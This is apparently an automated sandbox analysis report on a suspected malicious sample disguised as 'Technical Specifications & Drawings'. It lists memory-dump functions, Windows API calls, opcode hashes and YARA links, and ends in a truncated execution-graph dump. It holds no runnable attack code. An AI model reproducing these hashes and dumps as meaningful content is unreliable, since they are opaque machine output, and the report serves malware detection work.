                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00E7C40B Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1255 e7c40b-e7c4a4 DuplicateHandle 1256 e7c4a6-e7c4ac 1255->1256 1257 e7c4ad-e7c4ca 1255->1257 1256->1257
                                                  APIs
                                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00E7C497
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.263113012.0000000000E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E70000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_e70000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID: DuplicateHandle
                                                  • String ID:
                                                  • API String ID: 3793708945-0
                                                  • Opcode ID: d09ee7dd2109bd2a6ba7e31bb004e5e4c31758aa8ff2694b647e550db9f6183f
                                                  • Instruction ID: fcdbef0dc42cfc665cad26ac98b6f4471f813f7ec3c51f61fdd9dd1a670f83f8
                                                  • Opcode Fuzzy Hash: d09ee7dd2109bd2a6ba7e31bb004e5e4c31758aa8ff2694b647e550db9f6183f
                                                  • Instruction Fuzzy Hash: 1A2103B5D002589FCB10CFA9D884AEEBFF8FB48324F14841AE858A3310D374A955CF60
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00E7C410 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1260 e7c410-e7c4a4 DuplicateHandle 1261 e7c4a6-e7c4ac 1260->1261 1262 e7c4ad-e7c4ca 1260->1262 1261->1262
                                                  APIs
                                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00E7C497
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.263113012.0000000000E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E70000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_e70000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID: DuplicateHandle
                                                  • String ID:
                                                  • API String ID: 3793708945-0
                                                  • Opcode ID: f055e3465f5ce5c6cd92e61e364925a14f91dbc1b21bb72671330e8f7763149c
                                                  • Instruction ID: 96509f4f03730cfcb0c20e3c22f52fbafd3651c2f84e26bfc878ffca32eec5b1
                                                  • Opcode Fuzzy Hash: f055e3465f5ce5c6cd92e61e364925a14f91dbc1b21bb72671330e8f7763149c
                                                  • Instruction Fuzzy Hash: 7221F5B5D002189FDB10CF9AD884ADEBBF8FB48324F14841AE818B7710D374A954CFA1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00E79468 Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1265 e79468-e7a3b0 1267 e7a3b2-e7a3b5 1265->1267 1268 e7a3b8-e7a3e7 LoadLibraryExW 1265->1268 1267->1268 1269 e7a3f0-e7a40d 1268->1269 1270 e7a3e9-e7a3ef 1268->1270 1270->1269
                                                  APIs
                                                  • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,00E7A1C9,00000800,00000000,00000000), ref: 00E7A3DA
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.263113012.0000000000E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E70000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_e70000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID: LibraryLoad
                                                  • String ID:
                                                  • API String ID: 1029625771-0
                                                  • Opcode ID: 2d0d7e546e5d6c689ce1e9fbaa427965495d22d51fdc155ebfc043f9ee36933f
                                                  • Instruction ID: ab3528fc10be8a4f46259557c0355727148460edf05b4233867a1cb676143e06
                                                  • Opcode Fuzzy Hash: 2d0d7e546e5d6c689ce1e9fbaa427965495d22d51fdc155ebfc043f9ee36933f
                                                  • Instruction Fuzzy Hash: 0B11D3B69002499FCB10CF9AC444BDEBBF4EB88324F14842AD419BB600D3B5A945CFA5
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00E7A368 Relevance: 1.6, APIs: 1, Instructions: 53libraryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,00E7A1C9,00000800,00000000,00000000), ref: 00E7A3DA
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.263113012.0000000000E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E70000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_e70000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID: LibraryLoad
                                                  • String ID:
                                                  • API String ID: 1029625771-0
                                                  • Opcode ID: efe78f3dd0dbac2dac7c655b8454b7189588edf3e8e3806d8026639c7bd2e69e
                                                  • Instruction ID: 701a5ed2155aa2db8c8c1cb10180abae2563b7b99ca225d8cbe999bdbb6d2325
                                                  • Opcode Fuzzy Hash: efe78f3dd0dbac2dac7c655b8454b7189588edf3e8e3806d8026639c7bd2e69e
                                                  • Instruction Fuzzy Hash: 471112B6D002499FDB10CFAAC444BEEFBF4EB88324F14852AD419B7650C375A945CFA5
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 028E0B78 Relevance: 1.5, APIs: 1, Instructions: 49COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • SetWindowLongW.USER32(?,?,?), ref: 028E0BDD
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.263681394.00000000028E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_28e0000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID: LongWindow
                                                  • String ID:
                                                  • API String ID: 1378638983-0
                                                  • Opcode ID: 37c371389d83a0f1cbaeb31eb80e2a8159b22f382d12f8a4c293637eed19c68e
                                                  • Instruction ID: c64bb11c643b1eb596d836fd0e302d22cf4ea942d0e2696793841f17b80c8d85
                                                  • Opcode Fuzzy Hash: 37c371389d83a0f1cbaeb31eb80e2a8159b22f382d12f8a4c293637eed19c68e
                                                  • Instruction Fuzzy Hash: 551102B99002498FCB10CF99C485BDEBBF8EB49228F14851AD859A7600D3B4A944CFA1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00E7A0E8 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetModuleHandleW.KERNELBASE(00000000), ref: 00E7A14E
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.263113012.0000000000E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E70000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_e70000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID: HandleModule
                                                  • String ID:
                                                  • API String ID: 4139908857-0
                                                  • Opcode ID: 13fab47994528e0331861eeeaa99ab649b43ca9bce85cfc4f9b94695a9ac46bf
                                                  • Instruction ID: 962b32d926b13813a5e647d390c298945371bcdb547550c87c5ec04b81e8f156
                                                  • Opcode Fuzzy Hash: 13fab47994528e0331861eeeaa99ab649b43ca9bce85cfc4f9b94695a9ac46bf
                                                  • Instruction Fuzzy Hash: 4611D2B5D012498FDB10CF9AC444BDFFBF4AB88324F14852AD419B7610D375A545CFA1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 028E0B80 Relevance: 1.5, APIs: 1, Instructions: 44COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • SetWindowLongW.USER32(?,?,?), ref: 028E0BDD
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.263681394.00000000028E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_28e0000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID: LongWindow
                                                  • String ID:
                                                  • API String ID: 1378638983-0
                                                  • Opcode ID: 3c24167edcb0ec94bc5c4efbd11ef984453cbd0574b02cceab3002d8515c6c43
                                                  • Instruction ID: 3683bba662635fb6e5f1080ed2e942c783f06b2aa4884ae2c5008a08de1da12e
                                                  • Opcode Fuzzy Hash: 3c24167edcb0ec94bc5c4efbd11ef984453cbd0574b02cceab3002d8515c6c43
                                                  • Instruction Fuzzy Hash: 4511EDB99002098FDB10CF99D485BDABBF8EB88228F10841AD819A7600D3B4A944CFA1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00D7D4C4 Relevance: .1, Instructions: 75COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.262981822.0000000000D7D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D7D000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_d7d000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 37540db03c56904a975d3e303b949d6365ffdcb2dcb405e3e51ff3f646bf2582
                                                  • Instruction ID: 3b4495e1629143b59f820ce635a9e8e6e5ff17bda489d3400949ec4d3c524647
                                                  • Opcode Fuzzy Hash: 37540db03c56904a975d3e303b949d6365ffdcb2dcb405e3e51ff3f646bf2582
                                                  • Instruction Fuzzy Hash: BA21FF71504240EFCB05DF14D9C0B26BF76FF88328F28C669E8490B646D336E85ACAB1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00D8D01C Relevance: .1, Instructions: 72COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.263005992.0000000000D8D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D8D000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_d8d000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 2b27ed10c732f6b092f8c89cf8c1e0af1734d8fef24cd580fc87e82ec2e50ef5
                                                  • Instruction ID: 8dc606985883ddafe7a16feeef3d1f01f4c3190e3961fba3b29840d1f97dc2e4
                                                  • Opcode Fuzzy Hash: 2b27ed10c732f6b092f8c89cf8c1e0af1734d8fef24cd580fc87e82ec2e50ef5
                                                  • Instruction Fuzzy Hash: 3121D375504240EFDB14EF14D8C4B16BB66EB84314F24C569D8494B7C6C33AD85BCBB1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00D8D1D4 Relevance: .1, Instructions: 72COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.263005992.0000000000D8D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D8D000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_d8d000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: f09e0adaa251cd54f0dd72b005825384fdea2ba51cab8342ae338c7c003c3035
                                                  • Instruction ID: b5dbbe4b5b10c616bc1649d39bff7de80f74252db0398454f20dd26e89d7f5f9
                                                  • Opcode Fuzzy Hash: f09e0adaa251cd54f0dd72b005825384fdea2ba51cab8342ae338c7c003c3035
                                                  • Instruction Fuzzy Hash: D121D371504200AFDB01EF14D5C0B16BB66FB84318F24C56DD8494B6C5C336D85ACB75
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00D8D005 Relevance: .1, Instructions: 62COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.263005992.0000000000D8D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D8D000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_d8d000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 0c3327142ae4d30599d25db17b9f926fea9f06f51377752ca37eb0ae8900aa1c
                                                  • Instruction ID: 2299fc2323a4b4eaa0e4a3652e4f2c40037905309f9f4d08d3da379db402b474
                                                  • Opcode Fuzzy Hash: 0c3327142ae4d30599d25db17b9f926fea9f06f51377752ca37eb0ae8900aa1c
                                                  • Instruction Fuzzy Hash: 782192755093C08FCB12DF20D994715BF72EB46314F28C5EAD8498B6D7C33A984ACB62
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00D7D4BF Relevance: .1, Instructions: 56COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.262981822.0000000000D7D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D7D000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_d7d000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 11413410431b25643b9e67145488c251c0c75bd4eff5456ff6de99636f3f237f
                                                  • Instruction ID: d53d059d731b37e246dfe18b32f11d4a0b2181a211561f4d1ba5631dd19b2451
                                                  • Opcode Fuzzy Hash: 11413410431b25643b9e67145488c251c0c75bd4eff5456ff6de99636f3f237f
                                                  • Instruction Fuzzy Hash: 9011D376504280CFCB12CF10D5C4B16BF72FF85324F28C6A9D8490B656C336D85ACBA1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00D8D1CF Relevance: .1, Instructions: 53COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.263005992.0000000000D8D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D8D000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_d8d000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 21d3a248ede503457ed8a184fe0086bc99410cdb00019fb485fd86e010d30234
                                                  • Instruction ID: a066a9aaed17d273f1ef3fd997656713898e397d1835485e0d74052ea9ee51b2
                                                  • Opcode Fuzzy Hash: 21d3a248ede503457ed8a184fe0086bc99410cdb00019fb485fd86e010d30234
                                                  • Instruction Fuzzy Hash: CD119D75904280DFCB12EF14D5C4B15FBB2FB84324F28C6ADD8494B696C33AD85ACB61
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00D7D745 Relevance: .0, Instructions: 45COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.262981822.0000000000D7D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D7D000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_d7d000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: debe6058f0d84eeef800b69100b4b434eccf5362916cc35ede77c1c0adf19839
                                                  • Instruction ID: f06113e61d5b5f42fd2d4a897cc271a530121442c40da9fa1bb84ad84fa4b413
                                                  • Opcode Fuzzy Hash: debe6058f0d84eeef800b69100b4b434eccf5362916cc35ede77c1c0adf19839
                                                  • Instruction Fuzzy Hash: 3A01F2714043809AE7245E25CD84BA7BBA8EF81378F18C55AED0A4A682E379D844CAB1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00D7D744 Relevance: .0, Instructions: 36COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.262981822.0000000000D7D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D7D000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_d7d000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 16e6aca4b791d5c6961b080f4d015d9c51df3b79836caeeda50b2cad311f7403
                                                  • Instruction ID: 10b3c3662f233a442dd6da7a794381c6e02017e5d136af90c2d17481d075805a
                                                  • Opcode Fuzzy Hash: 16e6aca4b791d5c6961b080f4d015d9c51df3b79836caeeda50b2cad311f7403
                                                  • Instruction Fuzzy Hash: B0F0F6714043849EEB148E19CCC8BA3FFA8EF81734F18C45AED094B686D3789C44CAB0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Non-executed Functions

                                                  Function 00E7F0D0 Relevance: .3, Instructions: 315COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.263113012.0000000000E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E70000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_e70000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 303c3da1ae5ca22b2d08f86d1581d3a677b9d93c0ebcde07816304df8db41895
                                                  • Instruction ID: e76978f65317a2ad7da72082c99d7fca751817b2601e12d7e374ed918c477bd3
                                                  • Opcode Fuzzy Hash: 303c3da1ae5ca22b2d08f86d1581d3a677b9d93c0ebcde07816304df8db41895
                                                  • Instruction Fuzzy Hash: 4012B5F9E917468BD310CF65E9881893FE1B765328BD0CA0BD2612BAD1D7B4116ECF48
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00E7CD04 Relevance: .3, Instructions: 265COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.263113012.0000000000E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E70000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_e70000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: ba5ced167040c8080185854dbfdc10d16d2252d7eb4904df0f54690d58407570
                                                  • Instruction ID: 1909ffb3e6148265609eb17e4794360aa44dd5b2c6d6f54cd155e5a3fc73300a
                                                  • Opcode Fuzzy Hash: ba5ced167040c8080185854dbfdc10d16d2252d7eb4904df0f54690d58407570
                                                  • Instruction Fuzzy Hash: 2CA19132E002198FCF15CFA5C8445DEBBF6FF89304B1595AAE909BB261EB31E915CB40
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 028E40D1 Relevance: .2, Instructions: 167COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.263681394.00000000028E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_28e0000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: e492f657a54f4678133e262fa8a5e5574cfb7ea223ce431fddc0987b5b8a13ff
                                                  • Instruction ID: 5165518470727b44d2c893c669bb612694d80cd3d92689bf5bdca5d075c9b185
                                                  • Opcode Fuzzy Hash: e492f657a54f4678133e262fa8a5e5574cfb7ea223ce431fddc0987b5b8a13ff
                                                  • Instruction Fuzzy Hash: 2D612E38A103098FDF05DFA4C9949EEB7F6EF86304F254169E40AAB660EF30AD45CB50
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Execution Graph

                                                  Execution Coverage:0.6%
                                                  Dynamic/Decrypted Code Coverage:100%
                                                  Signature Coverage:61.7%
                                                  Total number of Nodes:2000
                                                  Total number of Limit Nodes:87
                                                  execution_graph 18494 1862d82 18495 1862d8e _vswprintf_s 18494->18495 18496 1862da6 RtlDebugPrintTimes 18495->18496 18497 1862dc0 18495->18497 18499 1862dbb 18496->18499 18544 17a40e1 18497->18544 18501 17fd130 _vswprintf_s 12 API calls 18499->18501 18500 1862f7c 18655 18630c4 18500->18655 18503 18630c1 18501->18503 18505 1863027 GetPEB 18507 1863032 GetPEB 18505->18507 18508 186304f 18505->18508 18506 1862e29 18510 1862e38 18506->18510 18513 17beef0 27 API calls 18506->18513 18509 17ab150 _vswprintf_s 12 API calls 18507->18509 18511 17ab150 _vswprintf_s 12 API calls 18508->18511 18512 186304c 18509->18512 18559 1864496 18510->18559 18511->18512 18514 17ab150 _vswprintf_s 12 API calls 18512->18514 18513->18510 18514->18500 18516 1862e53 18623 18649a4 18516->18623 18520 1862eab 18521 1862ecc 18520->18521 18526 17d16c7 LdrInitializeThunk 18520->18526 18522 1862f18 GetPEB 18521->18522 18523 1864496 128 API calls 18521->18523 18524 1862f95 18522->18524 18525 1862f29 18522->18525 18523->18522 18524->18500 18532 1862fd0 GetPEB 18524->18532 18527 1862f2e GetPEB 18525->18527 18528 1862f4b 18525->18528 18526->18521 18529 17ab150 _vswprintf_s 12 API calls 18527->18529 18530 17ab150 _vswprintf_s 12 API calls 18528->18530 18531 1862f48 18529->18531 18530->18531 18533 17ab150 _vswprintf_s 12 API calls 18531->18533 18534 1862fdb GetPEB 18532->18534 18535 1862ff8 18532->18535 18543 1862f69 GetPEB 18533->18543 18536 17ab150 _vswprintf_s 12 API calls 18534->18536 18537 17ab150 _vswprintf_s 12 API calls 18535->18537 18539 1862ff5 18536->18539 18537->18539 18647 184d455 18539->18647 18541 186300e 18542 17ab150 _vswprintf_s 12 API calls 18541->18542 18542->18543 18543->18500 18545 1800423 GetPEB 18544->18545 18546 17a40f7 18544->18546 18547 180044c 18545->18547 18548 180042f GetPEB 18545->18548 18546->18500 18546->18505 18546->18506 18549 17ab150 _vswprintf_s 12 API calls 18547->18549 18550 17ab150 _vswprintf_s 12 API calls 18548->18550 18551 1800449 18549->18551 18550->18551 18552 17ab150 _vswprintf_s 12 API calls 18551->18552 18553 1800462 18552->18553 18554 1800473 18553->18554 18555 17ab150 _vswprintf_s 12 API calls 18553->18555 18556 17ab150 _vswprintf_s 12 API calls 18554->18556 18555->18554 18557 180047f GetPEB 18556->18557 18558 180048c 18557->18558 18560 18649a4 16 API calls 18559->18560 18566 18644b7 18560->18566 18561 18647f2 GetPEB 18562 18647fe 18561->18562 18563 1864738 18562->18563 18727 17d174b 18562->18727 18563->18516 18565 1864564 18580 186459f 18565->18580 18659 17e9660 LdrInitializeThunk 18565->18659 18566->18561 18566->18563 18566->18565 18567 1864697 GetPEB 18566->18567 18570 185fa2b 28 API calls 18566->18570 18571 1864636 GetPEB 18566->18571 18572 18646a3 GetPEB 18567->18572 18573 18646c0 18567->18573 18569 1864796 18578 1864830 18569->18578 18579 18647aa GetPEB 18569->18579 18570->18566 18575 1864642 GetPEB 18571->18575 18576 186465f 18571->18576 18581 17ab150 _vswprintf_s 12 API calls 18572->18581 18574 17ab150 _vswprintf_s 12 API calls 18573->18574 18587 18646bd 18574->18587 18582 17ab150 _vswprintf_s 12 API calls 18575->18582 18584 17ab150 _vswprintf_s 12 API calls 18576->18584 18589 1864835 GetPEB 18578->18589 18590 1864879 18578->18590 18585 18647b6 GetPEB 18579->18585 18586 18647d3 18579->18586 18580->18563 18583 1864759 18580->18583 18588 185fa2b 28 API calls 18580->18588 18660 18523e3 18580->18660 18581->18587 18591 186465c 18582->18591 18583->18569 18610 1864675 18583->18610 18671 1864aef 18583->18671 18584->18591 18592 17ab150 _vswprintf_s 12 API calls 18585->18592 18593 17ab150 _vswprintf_s 12 API calls 18586->18593 18594 17ab150 _vswprintf_s 12 API calls 18587->18594 18588->18580 18596 1864841 GetPEB 18589->18596 18597 186485e 18589->18597 18590->18563 18603 18648fb GetPEB 18590->18603 18604 18648a8 18590->18604 18599 17ab150 _vswprintf_s 12 API calls 18591->18599 18600 18647d0 18592->18600 18593->18600 18594->18610 18601 17ab150 _vswprintf_s 12 API calls 18596->18601 18598 17ab150 _vswprintf_s 12 API calls 18597->18598 18598->18600 18599->18610 18606 17ab150 _vswprintf_s 12 API calls 18600->18606 18601->18600 18602 18648dc 18605 17d174b 14 API calls 18602->18605 18608 1864907 GetPEB 18603->18608 18609 1864924 18603->18609 18604->18602 18607 186494f GetPEB 18604->18607 18605->18563 18606->18610 18613 186495b GetPEB 18607->18613 18614 1864978 18607->18614 18611 17ab150 _vswprintf_s 12 API calls 18608->18611 18612 17ab150 _vswprintf_s 12 API calls 18609->18612 18610->18561 18615 1864921 18611->18615 18612->18615 18616 17ab150 _vswprintf_s 12 API calls 18613->18616 18617 17ab150 _vswprintf_s 12 API calls 18614->18617 18619 17ab150 _vswprintf_s 12 API calls 18615->18619 18618 1864975 18616->18618 18617->18618 18620 17ab150 _vswprintf_s 12 API calls 18618->18620 18621 1864947 18619->18621 18622 186499c 18620->18622 18621->18607 18624 18649bc 18623->18624 18636 1862e6b 18623->18636 18626 18649e4 _vswprintf_s 18624->18626 19272 17e9660 LdrInitializeThunk 18624->19272 18627 1864a21 GetPEB 18626->18627 18626->18636 18628 1864a2d GetPEB 18627->18628 18629 1864a4a 18627->18629 18631 17ab150 _vswprintf_s 12 API calls 18628->18631 18630 17ab150 _vswprintf_s 12 API calls 18629->18630 18632 1864a47 18630->18632 18631->18632 18633 17ab150 _vswprintf_s 12 API calls 18632->18633 18634 1864a6b 18633->18634 18635 1864a9b GetPEB 18634->18635 18634->18636 18637 1864aa7 GetPEB 18635->18637 18638 1864ac4 18635->18638 18636->18500 18636->18520 18643 185fa2b 18636->18643 18639 17ab150 _vswprintf_s 12 API calls 18637->18639 18640 17ab150 _vswprintf_s 12 API calls 18638->18640 18641 1864ac1 18639->18641 18640->18641 18642 17ab150 _vswprintf_s 12 API calls 18641->18642 18642->18636 18646 185fa37 _vswprintf_s 18643->18646 18644 185fcda _vswprintf_s 18644->18520 18645 186a80d 28 API calls 18645->18644 18646->18644 18646->18645 18648 184d4df 18647->18648 18649 184d462 18647->18649 18648->18541 18649->18648 18650 184d493 18649->18650 18651 184d4c5 18649->18651 19273 1823bd3 18650->19273 18653 1823bd3 12 API calls 18651->18653 18654 184d4c0 18653->18654 18654->18541 18656 18630ca 18655->18656 18657 18630d8 18655->18657 18658 17beb70 34 API calls 18656->18658 18657->18499 18658->18657 18659->18580 18661 18523f9 18660->18661 18670 1852588 18660->18670 18662 1852531 GetPEB 18661->18662 18661->18670 18663 185255c 18662->18663 18664 185253e GetPEB 18662->18664 18666 17ab150 _vswprintf_s 12 API calls 18663->18666 18665 17ab150 _vswprintf_s 12 API calls 18664->18665 18667 1852559 18665->18667 18666->18667 18668 17ab150 _vswprintf_s 12 API calls 18667->18668 18669 1852579 GetPEB 18668->18669 18669->18670 18670->18580 18704 1864eb2 18671->18704 18725 1864b15 18671->18725 18672 18650d5 18674 18650de GetPEB 18672->18674 18709 1864f39 18672->18709 18673 1864ec1 GetPEB 18675 18650b6 18673->18675 18676 1864ed1 GetPEB 18673->18676 18678 1865107 18674->18678 18679 18650ea GetPEB 18674->18679 18681 17ab150 _vswprintf_s 12 API calls 18675->18681 18680 17ab150 _vswprintf_s 12 API calls 18676->18680 18677 1865045 GetPEB 18683 1865051 GetPEB 18677->18683 18684 186506e 18677->18684 18688 17ab150 _vswprintf_s 12 API calls 18678->18688 18686 17ab150 _vswprintf_s 12 API calls 18679->18686 18690 1864eeb 18680->18690 18681->18690 18682 185fa2b 28 API calls 18682->18725 18685 17ab150 _vswprintf_s 12 API calls 18683->18685 18687 17ab150 _vswprintf_s 12 API calls 18684->18687 18689 186506b 18685->18689 18686->18690 18687->18689 18688->18690 18691 17ab150 _vswprintf_s 12 API calls 18689->18691 18692 17ab150 _vswprintf_s 12 API calls 18690->18692 18691->18709 18692->18709 18693 18523e3 15 API calls 18693->18725 18694 1865001 GetPEB 18696 186500d GetPEB 18694->18696 18697 186502a 18694->18697 18695 186a80d 28 API calls 18695->18725 18700 17ab150 _vswprintf_s 12 API calls 18696->18700 18703 17ab150 _vswprintf_s 12 API calls 18697->18703 18698 1864ef1 GetPEB 18701 1864efd GetPEB 18698->18701 18702 1864f1a 18698->18702 18699 1864f88 18699->18709 18710 1864f9e GetPEB 18699->18710 18706 1865027 18700->18706 18707 17ab150 _vswprintf_s 12 API calls 18701->18707 18708 17ab150 _vswprintf_s 12 API calls 18702->18708 18703->18706 18704->18672 18704->18673 18706->18677 18724 1864f17 18707->18724 18708->18724 18709->18583 18712 1864fc7 18710->18712 18713 1864faa GetPEB 18710->18713 18714 17ab150 _vswprintf_s 12 API calls 18712->18714 18716 17ab150 _vswprintf_s 12 API calls 18713->18716 18714->18724 18716->18724 18718 17ab150 _vswprintf_s 12 API calls 18718->18709 18719 1864f41 GetPEB 18720 1864f4d GetPEB 18719->18720 18721 1864f6a 18719->18721 18722 17ab150 _vswprintf_s 12 API calls 18720->18722 18723 17ab150 _vswprintf_s 12 API calls 18721->18723 18722->18724 18723->18724 18724->18718 18725->18677 18725->18682 18725->18693 18725->18694 18725->18695 18725->18698 18725->18699 18725->18704 18725->18709 18725->18719 18734 17cbc04 18725->18734 18739 17ca229 18725->18739 18786 17ca309 18725->18786 18924 17ce12c 18725->18924 18928 17ce4a0 18725->18928 19270 17e96e0 LdrInitializeThunk 18727->19270 18729 